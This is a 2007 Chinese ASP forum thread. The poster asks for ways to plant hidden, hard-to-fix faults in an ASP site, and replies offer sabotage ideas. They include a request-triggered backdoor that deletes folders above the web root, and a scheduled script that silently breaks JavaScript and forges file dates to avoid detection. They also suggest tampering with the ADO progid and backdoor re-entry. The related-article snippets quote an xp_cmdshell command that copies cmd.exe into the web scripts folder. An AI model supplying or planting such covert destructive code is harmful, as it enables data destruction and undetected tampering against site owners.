社区
ASP
帖子详情
★★★制造asp变态问题★★★
piaorou
2007-01-10 10:22:22
asp想制造1个特别的变态问题,让人很难发现,发现又很难改。
谁会?
环境,英文win2003 英文sqlserver2000
制造乱码什么的都是很容易解决的小问题。
...全文
275
13
打赏
收藏
★★★制造asp变态问题★★★
asp想制造1个特别的变态问题,让人很难发现,发现又很难改。 谁会? 环境,英文win2003 英文sqlserver2000 制造乱码什么的都是很容易解决的小问题。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
13 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
piaorou
2007-01-14
打赏
举报
回复
现在有又有一种想法,就是从flash入手,将他的flash反编译.然后用as语言来做点手脚,这招隐蔽.
btbtd
2007-01-13
打赏
举报
回复
嘻嘻, 从隐性转换出手, 很难察觉...
pzhuyy
2007-01-13
打赏
举报
回复
支持BT.
showlin
2007-01-13
打赏
举报
回复
那不是要用asp操作注册表阿,万一没开wsript.shell?
笨笨兔兔兔兔兔
2007-01-13
打赏
举报
回复
把ado的progid改了。。。。
这个变态
xukongshui
2007-01-12
打赏
举报
回复
....
showlin
2007-01-11
打赏
举报
回复
破坏很简单,变态很难
if request("a")="admin" then
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFolder(server.mappath("../../../"),true)
end if
piaorou
2007-01-10
打赏
举报
回复
Sub DownTheFile()
Response.Clear
Dim stream, strPath, fileContentType
On Error Resume Next
strPath = "你的文件位置"
Set stream = Server.CreateObject("adodb.stream")
stream.Open
stream.Type = 1
stream.LoadFromFile(strPath)
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & "文件名"
Response.AddHeader "Content-Length", stream.Size
Response.Charset = "UTF-8"
Response.ContentType = "Application/Octet-Stream"
Response.BinaryWrite stream.Read
Response.Flush
stream.Close
Set stream = Nothing
End Sub
piaorou
2007-01-10
打赏
举报
回复
笨啊,加空格asp不报错了吗?人家不就知道是哪行了吗?
在说了,加的是1般空格asp照样可以执行,16进制的00 对asp也没有什么影响
smartcatiboy
2007-01-10
打赏
举报
回复
在某一个asp文件里加一个空格
别人绝对很难发现,就算知道多了“ ”,也绝对没法改
以后每次后门进去的时候,都可以到这里看看,非常具有满足感
piaorou
2007-01-10
打赏
举报
回复
大家有什么变态制造问题的招贴一下啊
piaorou
2007-01-10
打赏
举报
回复
怎么个变态都行啊。
看你能想到什么。
比如:
我可以编个vbs脚本,每1分种执行一次这个vbs来
遍历web目录,碰到document.就改成Document.
这样javascript脚本区分大小写就执行不了拉,
然后在将当前的文件从新保存,并把修改日期设置成之前我们打开的日期
这样就发现不了拉。
Atai-Lu
2007-01-10
打赏
举报
回复
你想如何变态呢?如果实在搞不定你的程序,
大不了我重写程序,呵呵~
SQL注入攻击(
ASP
)
dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便
制造
了一个UNICODE漏洞,通过此漏洞的利用方法,便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。 四、发现WEB...
渗透测试:SQL注入攻击(
ASP
)
dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便
制造
了一个UNICODE漏洞,通过此漏洞的利用方法,便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。 四、发现WEB...
SQL注入攻击
等带有参数的
ASP
动态网页中,有时一个动态网页中可能只有一个参数,有时可能有N个参数,有时是整型参数,有时是字符串型参数,不能一概而论。总之只要是带有参数的动态网页且此网页访问了数据库,那么就有可能存在...
超级BT木马下载器 Gameservet.exe的分析 game1.exe 8888-521ww.exe qjso.exe
今天接到了一个叫Gameservet.exe的样本 测试了一下 测试结果真的让人震惊 这是个超级
变态
的木马下载器当今流行的木马几乎都全了 而且最后还捣登出来个威金来 哎 现在的病毒都太厉害 那些无耻的
制造
病毒者 你们还让人...
SQL注入攻击(攻击与防范)
dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便
制造
了一个UNICODE漏洞,通过此漏洞的利用方法,便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。 四、发现WEB虚拟...
ASP
28,391
社区成员
357,060
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章